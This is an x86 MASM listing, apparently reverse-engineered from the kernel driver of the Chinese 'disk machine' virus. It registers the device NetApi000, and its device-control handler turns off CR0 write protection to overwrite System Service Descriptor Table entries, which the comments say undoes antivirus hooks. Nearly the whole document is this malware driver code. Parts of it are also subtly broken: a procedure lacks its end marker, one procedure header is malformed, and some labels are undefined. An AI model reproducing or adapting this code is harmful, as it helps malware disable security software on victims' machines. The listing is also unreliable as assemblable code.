;对磁盘机病毒驱动部分进行逆向分析,这是简单的逆向代码,可以了解磁盘机驱动部分的原理。
.386
.model flat, stdcall
option casemap:none
;+++++++++++++++++++++++++++++++++++++++++++++++++++++
; include文件定义
;+++++++++++++++++++++++++++++++++++++++++++++++++++++
include ntstatus.inc
include ntddk.inc
include hal.inc
includelib hal.lib
include ntoskrnl.inc
includelib ntoskrnl.lib
include w2kundoc.inc
include winioctl.inc
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
UNICODE_STRING struc ; (sizeof=0x8, standard type)
Length dw ?
MaximumLength dw ?
Buffer dd ? ; offset
UNICODE_STRING ends
.data
dword_10360 dd 0FFFFFFFFh ; DATA XREF: .text:000103E8o
dd offset loc_10487
dd offset loc_10495
dd 53445352h, 5632D867h, 45D1F0DEh, 0A70FE48Fh, 9D70EB8Eh, 21h
s_EDdkDdd2Drive db 'E:/DDK/ddd2/Driver/objfre/i386/ddd2.pdb',0
s_Dispatchcreat db 'DisPatchCreate!',0 ;
szunhook db '开始恢复SSDT',0
s_Deletesymboli db 'DeleteSymbolicLink Fail!',0 ;
; ---------------------------------------------------------------------------
align 4
SourceString:
unicode 0, </ABCTEST>,0
align 10h
s_DeviceNetapi0:
unicode 0, </Device/NetApi000>,0
Format db 'IoCreateDevice Fail!',0 ;
s_??Netapi000do:
unicode 0, </??/NetApi000DOS>,0
align 10h
s_Iocreatesymbo db 'IoCreateSymbolicLink fail!',0 ;
word_10780 dw 0 ;
word_10782 dw 0
lpMEM dd 0
db 0
db 0
db 0
db 0
word_1078C dw 0
; UNICODE_STRING DestinationString
DestinationString UNICODE_STRING <0>
; PDEVICE_OBJECT DeviceObject
DeviceObject dd 0
; UNICODE_STRING UNsymbolicName
UNsymbolicName UNICODE_STRING <0>
.code
DispatchCreate proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
push offset s_Dispatchcreat ; "DisPatchCreate!"
call DbgPrint
mov eax,pIrp
assume eax : ptr _IRP
mov [eax].IoStatus.Status, STATUS_SUCCESS
mov [eax].IoStatus.Information, 0
assume eax :nothing
invoke IoCompleteRequest,pIrp,IO_NO_INCREMENT
mov eax, STATUS_SUCCESS
ret
DispatchCreate endp
; ---------------------------------------------------------------------------
DispatchDeviceControl proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
push 18h
push offset dword_10360
call ExceptionHanlder
mov ebx, 0C0000010h
mov edi, [ebp+0Ch]
mov eax, [edi+60h]
mov ecx, [eax+0Ch]
loc_10400: ; CODE XREF: .text:000103DFj
mov edx, [eax+10h]
mov [ebp-1Ch], edx
mov esi, [edi+3Ch]
mov eax, [eax+4]
mov [ebp-20h], eax
cmp ecx, 22E14Bh
jnz exit
and dword ptr [ebp-4], 0
push 4
pop ebx
push ebx
push ebx
push edx
call ds:ProbeForRead
push ebx
push ebx
push esi
call ds:ProbeForWrite
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-1Ch]
mov ebx, [eax]
mov eax, ds:KeServiceDescriptorTable ; 恢复杀毒软件挂钩的SSDT
cmp [eax+8], ebx
ja short unhook
mov ebx, 0C000000Dh
jmp short exit
; ---------------------------------------------------------------------------
unhook: ; CODE XREF: .text:00010445j
mov eax, [eax]
mov [ebp-24h], eax
push dword ptr [esi]
push ebx
push offset szunhook
call DbgPrint
add esp, 0Ch
cli
mov eax, cr0 ; 打开写保护
and eax, 0FFFEFFFFh
mov cr0, eax
mov eax, [esi]
mov ecx, [ebp-24h]
mov [ecx+ebx*4], eax
mov eax, cr0
or eax, 10000h ; 恢复写保护
mov cr0, eax
sti
xor ebx, ebx
jmp short exit
; ---------------------------------------------------------------------------
loc_10487: ; DATA XREF: .text:00010364o
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov [ebp-28h], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_10495: ; DATA XREF: .text:00010368o
mov esp, [ebp-18h]
mov ebx, [ebp-28h]
or dword ptr [ebp-4], 0FFFFFFFFh
mov edi, [ebp+0Ch]
exit: ; CODE XREF: .text:00010415j
; .text:0001044Cj .text:00010485j
mov eax, ebx
neg eax
sbb eax, eax
not eax
and eax, [ebp-20h]
mov [edi+1Ch], eax
mov [edi+18h], ebx
xor dl, dl
mov ecx, edi
call ds:IofCompleteRequest
mov eax, ebx
call ReSEH
retn 8
DispatchDeviceControl endp
; ---------------------------------------------------------------------------
; ---------------------------------------------------------------------------
DriverUnload proc ; DATA XREF: DriverEntry+DAo
push offset UNsymbolicName
call ds:IoDeleteSymbolicLink
test eax, eax
jz short delOK
push offset s_Deletesymboli ; "DeleteSymbolicLink Fail!"
call DbgPrint
pop ecx
delOK: ; CODE XREF: .text:000104EEj
mov eax, [esp+4]
push dword ptr [eax+4]
call ds:IoDeleteDevice
retn 4
DriverEntry proc proc pDriverObject:PDRIVER_OBJECT, pRegistryPath:PUNICODE_STRING
;pDriverObject = dword ptr 0Ch
;pRegistryPath = dword ptr 10h
push ebx
push esi
mov esi, [esp+pRegistryPath]
push edi
xor eax, eax
mov ebx, offset word_10780
mov edi, ebx
stosd
stosd
stosd
stosd
mov ax, [esi]
mov word_10780, ax
mov ax, [esi]
add ax, 2
mov word_10782, ax
movzx eax, ax
push 32646464h ; Tag
xor edi, edi
push eax ; NumberOfBytes分配的大小
inc edi
push edi ; PoolType:NonPagedPool
call ds:ExAllocatePoolWithTag
test eax, eax
mov lpMEM, eax
jnz short is2003
mov eax, 0C000009Ah
jmp loc_106D7
; ---------------------------------------------------------------------------
is2003: ; CODE XREF: DriverEntry+44j
push esi ; SourceString
push ebx ; DestinationString
call ds:RtlCopyUnicodeString
mov esi, ds:IoIsWdmVersionAvailable
push 30h ; MinorVersion Windows Server 2003(30h)
push edi ; MajorVersion
call esi ; IoIsWdmVersionAvailable ; 判断操作系统是否支持WDM
test al, al
jz short isXP
mov word_1078C, 130h
jmp short supportWDM
; ---------------------------------------------------------------------------
isXP: ; CODE XREF: DriverEntry+65j
push 20h ; MinorVersionWindows XP(20h)
push edi ; MajorVersion
call esi ; IoIsWdmVersionAvailable
test al, al
jz short is2000
mov word_1078C, 120h
jmp short supportWDM
; ---------------------------------------------------------------------------
is2000: ; CODE XREF: DriverEntry+79j
push 10h ; MinorVersionWindows 2000(10h)
push edi ; MajorVersion
call esi ; IoIsWdmVersionAvailable
test al, al
jz short isME
mov word_1078C, 110h
jmp short supportWDM
; ---------------------------------------------------------------------------
isME: ; CODE XREF: DriverEntry+8Dj
push 5 ; MinorVersion Windows me(05h)
push edi ; MajorVersion
call esi ; IoIsWdmVersionAvailable
neg al
sbb eax, eax
and eax, 5
add eax, 100h
mov word_1078C, ax
supportWDM: ; CODE XREF: DriverEntry+70j
; DriverEntry+84j DriverEntry+98j
mov ebx, [esp+4+pDriverObject]
push 1Bh
pop ecx
mov eax, offset DispatchCreate
lea edi, [ebx+38h] ; IRP_MJ_CREATE
rep stosd
mov edi, ds:RtlInitUnicodeString
push offset SourceString ; "//ABCTEST"
mov esi, offset DestinationString
push esi ; DestinationString
mov dword ptr [ebx+70h], offset DispatchDeviceControl ; IRP_MJ_DEVICE_CONTROL
mov dword ptr [ebx+34h], offset DriverUnload
call edi ; RtlInitUnicodeString
push offset s_DeviceNetapi0 ; "//Device//NetApi000"
push esi ; DestinationString
call edi ; RtlInitUnicodeString
push offset DeviceObject ; DeviceObject
xor eax, eax
push eax ; Exclusive
push eax ; DeviceCharacteristics
push 22h ; DeviceType
push esi ; DeviceName
push eax ; DeviceExtensionSize
push ebx ; DriverObject
call ds:IoCreateDevice
mov ebx, eax
test ebx, ebx
jge short loc_106AF
push offset Format ; "IoCreateDevice Fail!"
call DbgPrint
pop ecx
mov eax, ebx
jmp short loc_106D7
; ---------------------------------------------------------------------------
loc_106AF: ; CODE XREF: DriverEntry+103j
push offset s_??Netapi000do ; "//??//NetApi000DOS"
mov ebx, offset UNsymbolicName
push ebx ; DestinationString
call edi ; RtlInitUnicodeString
push esi ; DeviceName
push ebx ; SymbolicLinkName
call ds:IoCreateSymbolicLink
mov esi, eax
test esi, esi
jge short loc_106D5
push offset s_Iocreatesymbo ; "IoCreateSymbolicLink fail!"
call DbgPrint
pop ecx
loc_106D5: ; CODE XREF: DriverEntry+12Dj
mov eax, esi
loc_106D7: ; CODE XREF: DriverEntry+4Bj
; DriverEntry+112j
pop edi
pop esi
pop ebx
retn 8
DriverEntry endp
; ---------------------------------------------------------------------------
ExceptionHanlder proc
push offset _except_handler3
mov eax, large fs:0
push eax
mov large fs:0, esp
mov eax, [esp+8+arg_4]
mov [esp+8+arg_4], ebp
lea ebp, [esp+8+arg_4]
sub esp, eax
push ebx
push esi
push edi
mov eax, [ebp-8]
mov [ebp-18h], esp
push eax
mov eax, [ebp-4]
mov dword ptr [ebp-4], 0FFFFFFFFh
mov [ebp-8], eax
retn
ExceptionHanlder endp
; *************** S U B R O U T I N E ***************************************
ReSEH proc near ; CODE XREF: .text:000104BFp
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop ecx
pop edi
pop esi
pop ebx
leave
push ecx
retn
ReSEH endp
end DriverEntry